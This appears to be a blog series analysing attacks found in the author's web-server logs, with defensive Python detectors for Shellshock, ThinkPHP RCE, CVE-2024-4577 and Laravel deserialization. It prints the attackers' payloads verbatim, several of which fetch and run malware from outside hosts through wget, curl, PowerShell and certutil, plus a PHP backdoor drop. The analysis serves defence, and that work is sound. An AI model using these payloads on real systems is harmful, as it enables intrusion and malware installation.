Monday, June 16, 2025

Learning System Vulnerabilities from Web Logs 98

An attack in the web log from 104.131.118.62 (United States); oddly, that host's website is already down:

104.131.118.62 - - [15/Jun/2025:17:18:00 +0800] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nZAZAZA\"';system(\"wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\")"

This is a Shellshock attack (CVE-2014-6271) carried in the User-Agent header. A quick Google search shows it has been around for more than ten years: it uses the Shellshock vulnerability to download an unknown file, gif.gif, from http://pjsn.hi2.ro (presumably malware disguised as an image), tries wget, curl and lwp-download in turn, runs the file as a malicious Perl script, and then deletes it.

The http://pjsn.hi2.ro address resolves to Russia, so it may be a Russian actor using the original 104.131.118.62 site as a relay.
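As an added example (not part of the original post), the check below parses an Apache combined-format line, looks for the Shellshock function-definition prefix `() { :;};` in the User-Agent, Referer and request fields, and pulls the second-stage download URLs out as indicators to block. The attack line is the one from this post; the benign line, and all function and field names, are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent".
# Quoted fields may contain \" (Apache's escaping), so each is matched as (non-quote | backslash-anything)*.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# Shellshock trigger: a header value that begins with a bash function definition "() { :;};"
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
# URLs inside the injected command chain (stop at whitespace, quotes, ';' or ')')
URL_RE = re.compile(r'https?://[^\s;"\'\\)]+')

# The attack line from this post, verbatim
SAMPLE_LINE = r'''104.131.118.62 - - [15/Jun/2025:17:18:00 +0800] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nZAZAZA\"';system(\"wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\")"'''
# A constructed benign line for comparison
BENIGN_LINE = '203.0.113.5 - - [15/Jun/2025:17:20:00 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"'


def parse_combined(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for field in ("request", "referer", "ua"):
        rec[field] = rec[field].replace('\\"', '"')  # undo Apache's quote escaping
    return rec


def analyze_shellshock(line):
    """Return findings for a line carrying a Shellshock payload, else None."""
    rec = parse_combined(line)
    if rec is None:
        return None
    carriers = {k: rec[k] for k in ("ua", "referer", "request")}
    hit_fields = [k for k, v in carriers.items() if SHELLSHOCK_RE.search(v)]
    if not hit_fields:
        return None
    urls = sorted({u for k in hit_fields for u in URL_RE.findall(carriers[k])})
    return {
        "source_ip": rec["ip"],
        "status": int(rec["status"]),
        "injected_via": hit_fields,                                      # which header carried the payload
        "payload_urls": urls,                                            # second-stage download URLs
        "payload_hosts": sorted({urlsplit(u).hostname for u in urls}),  # hosts to block or hunt for
    }


if __name__ == "__main__":
    for line in (SAMPLE_LINE, BENIGN_LINE):
        print(analyze_shellshock(line))
```

Run over a whole access log, the `payload_hosts` set is what goes into an egress block list; a 400 status, as here, means the server never handed the header to a CGI script, so the hit is a probe rather than a confirmed compromise.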

Saturday, June 7, 2025

Learning System Vulnerabilities from Web Logs 97

An attack from 20.171.207.237 (United States) found in the web log:

Attempting to inject a PHP backdoor
20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

Using the backdoor just planted to download and execute malware
20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

Running FxCodeShell.jsp to probe the server
20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

The main thing to note is the spoofed OpenAI GPTBot User-Agent:
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
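A spoofed crawler User-Agent is cheap to send but easy to verify: a genuine crawler comes from the ranges its operator publishes. The added example below (not from the original post) checks a GPTBot claim against an allow-list and, separately, matches the ThinkPHP invokefunction signature in the first request. The allow-list ranges are constructed documentation prefixes; in practice you load the ranges OpenAI publishes for GPTBot. The User-Agent and request strings are the ones from this post; the function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed sample allow-list for this example (RFC 5737 documentation prefixes).
# Real verification loads the egress ranges the crawler operator publishes for GPTBot.
SAMPLE_GPTBOT_RANGES = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.0/24")]

GPTBOT_CLAIM_RE = re.compile(r"\bGPTBot/\d+(?:\.\d+)*")

# Strings from this post's log: the spoofed User-Agent and the ThinkPHP backdoor-drop request
SPOOFED_UA = "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
BACKDOOR_REQUEST = ("GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction"
                    "&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3B"
                    "system%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1")


def verify_crawler_claim(client_ip, user_agent, allowed_ranges=SAMPLE_GPTBOT_RANGES):
    """'no-claim' if the UA does not claim GPTBot, 'verified' if the IP is in the allow-list, else 'forged'."""
    if not GPTBOT_CLAIM_RE.search(user_agent):
        return "no-claim"
    addr = ipaddress.ip_address(client_ip)
    return "verified" if any(addr in net for net in allowed_ranges) else "forged"


def looks_like_thinkphp_rce(request_line):
    """Signature for the ThinkPHP invokefunction probe: both markers present after URL-decoding."""
    decoded = unquote_plus(request_line).lower()
    return "invokefunction" in decoded and "call_user_func_array" in decoded


def triage(client_ip, user_agent, request_line):
    """Combine both checks; a forged crawler claim or an RCE signature is a block-and-alert case."""
    crawler = verify_crawler_claim(client_ip, user_agent)
    rce = looks_like_thinkphp_rce(request_line)
    return {"crawler": crawler, "thinkphp_rce": rce, "block": crawler == "forged" or rce}


if __name__ == "__main__":
    print(triage("20.171.207.237", SPOOFED_UA, BACKDOOR_REQUEST))
```

The two checks are independent on purpose: a real crawler never requests `invokefunction` with `call_user_func_array`, and a forged crawler claim is worth an alert even when the request itself looks harmless, because it is meant to slip past robots.txt exemptions and bot allow-lists.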

Friday, April 4, 2025

Microsoft removes the bypassnro command from Windows 11

Since Windows 11 22H2, during the initial setup after installation the bypassnro command could be used to skip the step that forces an internet connection and sign-in with a Microsoft account, so that a local account can be set up instead. Recently there have been reports that Microsoft will remove this command after version 24H2.

1. During initial setup, if there is no network connection you cannot proceed to the next step

2. At that point press Shift + F10 to open a command prompt and type oobe\bypassnro; the system then reboots automatically

Monday, March 31, 2025

Learning System Vulnerabilities from Web Logs 96

Someone from Spain carrying out a cryptojacking attack: the attacker tried to use my server to mine cryptocurrencies such as Monero (XMR) and Ethereum (ETH)

The following requests come from mining software; they try to connect to my server and subscribe to a mining pool
195.170.172.128 - - [30/Mar/2025:17:15:57 +0800] "\x16\x03\x01\x02" 400 226 "-" "-"
195.170.172.128 - - [30/Mar/2025:17:15:58 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n" 400 226 "-" "-"
195.170.172.128 - - [30/Mar/2025:17:16:00 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n" 400 226 "-" "-"

The following is part of the Ethereum mining protocol (Ethereum Stratum): the attacker tries to log in to their Ethereum mining account and use my server as a source of hashing power
195.170.172.128 - - [30/Mar/2025:17:16:01 +0800] "{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x044b879a07547d75de1f3bf0b35a9185d8db4c59\",\"x\"],\"jsonrpc\":\"2.0\"}\n" 400 226 "-" "-"

The following is a login request from the Monero (XMR) mining software XMRig; the attacker tries to get the server to start mining for them
195.170.172.128 - - [30/Mar/2025:17:16:03 +0800] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4AXkveLwwqn72xdjbC5ANKF4SypYA4nzKKZo4msYkbotMVFANkRQ2Bsa8aJqncbahb5Z1x11V7ZZiRMThZn2DRhrV3iqmpv\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 226 "-" "-"

All I can do is block the IP and close ports 3333 and 4444
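Because these are Stratum JSON-RPC messages sent to an HTTP port, Apache logs the raw request with its own escaping (`\"`, `\n`, `\xHH`). The added example below (not from the original post) undoes that escaping, recognises the Stratum methods seen in this post's log, and pulls out the miner agent and the wallet the attacker wants credited. The first three request fields are verbatim from the log; the XMRig message is shortened from the page's line (the `algo` list is cut down, the wallet is the page's), and the last one is a constructed benign request. Function names are assumptions.

```python
import json

# JSON-RPC methods a miner sends to a pool (Bitcoin/Ethereum Stratum and XMRig's login protocol)
MINING_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                  "eth_submitLogin", "eth_getWork", "eth_submitWork",
                  "login", "submit", "keepalived"}

# Request fields as Apache wrote them (backslashes are Apache's log escaping)
SAMPLE_REQUESTS = [
    r'\x16\x03\x01\x02',
    r'{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n',
    r'{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x044b879a07547d75de1f3bf0b35a9185d8db4c59\",\"x\"],\"jsonrpc\":\"2.0\"}\n',
    # XMRig login, shortened from the page's line
    r'{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4AXkveLwwqn72xdjbC5ANKF4SypYA4nzKKZo4msYkbotMVFANkRQ2Bsa8aJqncbahb5Z1x11V7ZZiRMThZn2DRhrV3iqmpv\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"rx/0\"]}}\n',
    r'GET /index.html HTTP/1.1',  # constructed benign request
]


def unescape_apache(field):
    """Undo Apache's request-field escaping: \\" -> ", \\n -> newline, \\xHH -> byte."""
    return field.encode("ascii").decode("unicode_escape")


def detect_stratum(request_field):
    """Classify one raw request field: TLS handshake, Stratum mining message, or None."""
    raw = unescape_apache(request_field)
    if raw.startswith("\x16\x03"):
        return {"kind": "tls-handshake"}  # TLS ClientHello sent to a plaintext port
    raw = raw.strip()
    if not raw.startswith("{"):
        return None
    try:
        msg = json.loads(raw)
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("method") not in MINING_METHODS:
        return None
    params = msg.get("params")
    wallet = agent = None
    if isinstance(params, dict):            # XMRig style: {"login": wallet, "agent": "XMRig/..."}
        wallet, agent = params.get("login"), params.get("agent")
    elif isinstance(params, list) and params:
        if msg["method"] == "mining.subscribe":   # params[0] is the miner's user-agent string
            agent = params[0]
        else:                                     # eth_submitLogin / mining.authorize: params[0] is wallet or worker
            wallet = params[0]
    return {"kind": "stratum", "method": msg["method"], "wallet": wallet, "agent": agent}


def mining_wallets(request_fields):
    """Wallet addresses seen across a batch of requests; these identify the beneficiary, not the host."""
    hits = (detect_stratum(f) for f in request_fields)
    return sorted({h["wallet"] for h in hits if h and h.get("wallet")})


if __name__ == "__main__":
    for field in SAMPLE_REQUESTS:
        print(detect_stratum(field))
    print(mining_wallets(SAMPLE_REQUESTS))
```

The wallet address is the useful pivot: the source IP changes, but the same payout address turning up in several scans ties them to one operator.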

Sunday, March 30, 2025

Learning System Vulnerabilities from Web Logs 95

Large numbers of identical attacks from different places (Uzbekistan, India, Kazakhstan, Russia, Turkmenistan, Ivory Coast); probably the same person or group

84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
103.1.103.81 - - [28/Mar/2025:19:55:28 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
188.232.103.100 - - [28/Mar/2025:20:06:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
185.69.185.169 - - [28/Mar/2025:20:09:15 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
213.230.120.119 - - [28/Mar/2025:20:15:46 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
41.207.204.167 - - [28/Mar/2025:21:30:40 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
49.47.129.57 - - [28/Mar/2025:22:41:33 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

After consulting the Google oracle: this is CVE-2024-4577, a command-injection remote attack on the PHP-CGI vulnerability in the XAMPP web stack on Windows (what puzzles me more is how there can be an IP ending in 0?)
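The query string in these lines is worth decoding: `%AD` is a soft hyphen, which Windows maps to `-` before php-cgi parses its arguments, so `%ADd` becomes `-d` and injects php.ini directives (`allow_url_include=1`, `auto_prepend_file=php://input`) that make the next request body executable. The added example below (not from the original post) decodes a raw query string that way and reports which directives an attacker tried to set; the query is the one from this post's log, the function name and directive list are assumptions.

```python
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = b"\xad"  # U+00AD; Windows best-fit mapping turns it into '-' before php-cgi parses argv
# php.ini directives whose injection via -d turns a CGI into a code-execution primitive
DANGEROUS_DIRECTIVES = {"allow_url_include", "auto_prepend_file", "auto_append_file",
                        "disable_functions", "open_basedir", "extension_dir", "extension"}

# Query string from this post's log lines (verbatim)
SAMPLE_QUERY = "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"


def inspect_php_cgi_query(query):
    """Report -d directive injection in a php-cgi query (CVE-2024-4577 style), or None if nothing found."""
    if "=" in query:
        # Apache only passes the query string as argv when it holds no literal '=' (ISINDEX rule);
        # that is why the payload spells '=' as %3d.
        return None
    argv = [unquote_to_bytes(part) for part in query.split("+") if part]
    directives, soft_hyphen = {}, False
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg[:1] in (b"-", SOFT_HYPHEN):
            soft_hyphen = soft_hyphen or arg[:1] == SOFT_HYPHEN
            if arg[1:2] == b"d":
                setting = arg[2:]                      # "-dname=value" form
                if not setting and i + 1 < len(argv):
                    i += 1                             # "-d name=value" form: directive is the next argv
                    setting = argv[i]
                name, _, value = setting.partition(b"=")
                directives[name.decode("latin-1")] = value.decode("latin-1")
        i += 1
    if not directives:
        return None
    return {
        # the CVE-2012-1823 fix rejects a literal '-' here; the soft hyphen slips past it and is mapped afterwards
        "soft_hyphen_evasion": soft_hyphen,
        "directives": directives,
        "dangerous": sorted(set(directives) & DANGEROUS_DIRECTIVES),
    }


if __name__ == "__main__":
    print(inspect_php_cgi_query(SAMPLE_QUERY))
```

A WAF rule that matches `%AD` at the start of a query-string argument catches this family regardless of which directive follows. (The address ending in .0 that the post wonders about is an ordinary host address: a last octet of 0 is only a network address when the prefix ends on a /24 boundary, and 95.59.244.0 can sit inside a larger block.)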

Saturday, March 15, 2025

Learning System Vulnerabilities from Web Logs 94

An attack in the web log from a Taiwanese IP, 1.163.243.200:
1.163.243.200 - - [14/Mar/2025:19:46:40 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F26.99.153.102%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"

After decoding it reads:
/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://26.99.153.102:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}

After asking the Google oracle, this is a CVE-2019-9081 Laravel deserialization attack. Laravel is an open-source PHP web framework; the attacker can exploit untrusted deserialization to trigger __destruct(), which then runs Artisan commands or system commands and leads to remote code execution (RCE). To defend against this kind of attack, avoid using unserialize() on external input, check the application for untrusted deserialization points, and upgrade Laravel.
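Triage of a payload like this means reading PHP's serialize() format: `O:len:"Class":n:{...}` objects, `a:n:{...}` arrays, `s:len:"..."` strings, with property names wrapped in NUL bytes (`\0*\0command` is a protected property; the decoded form in the post lost those NULs). The added example below (not from the original post) walks the serialized object from this post's request and lists the classes in the gadget chain and the strings that look like commands. It is deliberately lenient: the payload declares `s:2:` for the long `cmd.exe` string, a length PHP's unserialize() would reject outright, so the walker records the mismatch and resyncs instead of stopping. The request path is verbatim from the log; the class and function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The request path from this post's log (verbatim); parse_qs() undoes the URL encoding, including %00
SAMPLE_PATH = "/public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F26.99.153.102%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D"

SUSPICIOUS = ("system", "exec", "passthru", "popen", "cmd.exe", "certutil", "powershell", "/bin/sh", "curl ", "wget ")
QUOTED_END_RE = re.compile(r'"[;:]')


class PhpSerialized:
    """Lenient walker over PHP serialize() output; records class names and string values."""

    def __init__(self, text):
        self.text, self.pos = text, 0
        self.classes, self.strings, self.malformed = [], [], []

    def _take(self, token):
        if not self.text.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _until(self, ch):
        end = self.text.index(ch, self.pos)
        out, self.pos = self.text[self.pos:end], end + 1
        return out

    def _quoted(self):
        """Read len:"..."; PHP rejects a wrong length, we record it and resync on the next '";' or '":'."""
        length = int(self._until(":"))
        self._take('"')
        start, end = self.pos, self.pos + length
        if not QUOTED_END_RE.match(self.text, end):
            end = QUOTED_END_RE.search(self.text, start).start()
            self.malformed.append(self.text[start:end])
        self.pos = end + 1
        return self.text[start:end]

    def _members(self, count):
        self._take("{")
        out = {}
        for _ in range(count):
            key = self.parse()
            if isinstance(key, str):
                key = key.replace("\x00", "")  # "\0*\0name" = protected, "\0Class\0name" = private
            out[key] = self.parse()
        self._take("}")
        return out

    def parse(self):
        tag = self.text[self.pos]
        self.pos += 1
        if tag == "N":
            self._take(";")
            return None
        self._take(":")
        if tag == "b":
            return self._until(";") == "1"
        if tag == "i":
            return int(self._until(";"))
        if tag == "d":
            return float(self._until(";"))
        if tag == "s":
            value = self._quoted()
            self._take(";")
            self.strings.append(value)
            return value
        if tag == "a":
            return self._members(int(self._until(":")))
        if tag == "O":
            cls = self._quoted()
            self._take(":")
            self.classes.append(cls)
            props = self._members(int(self._until(":")))
            return {"__class__": cls, **props}
        raise ValueError(f"unsupported tag {tag!r} at offset {self.pos}")


def triage_php_payload(request_path, param="code"):
    """Decode the serialized object in a query parameter and summarize what the gadget chain would do."""
    values = parse_qs(urlsplit(request_path).query).get(param)
    if not values:
        return None
    walker = PhpSerialized(values[0])
    tree = walker.parse()
    return {
        "root_class": tree.get("__class__") if isinstance(tree, dict) else None,
        "classes": walker.classes,
        "suspicious_strings": [s for s in walker.strings if any(m in s for m in SUSPICIOUS)],
        "malformed_lengths": len(walker.malformed),
    }


if __name__ == "__main__":
    print(triage_php_payload(SAMPLE_PATH))
```

The class list is what to compare against the application's actual dependencies: a serialized `Illuminate\Foundation\Testing\PendingCommand` arriving in a query parameter has no legitimate source, which is also why `unserialize($data, ['allowed_classes' => false])` or a JSON format is the fix on the receiving side.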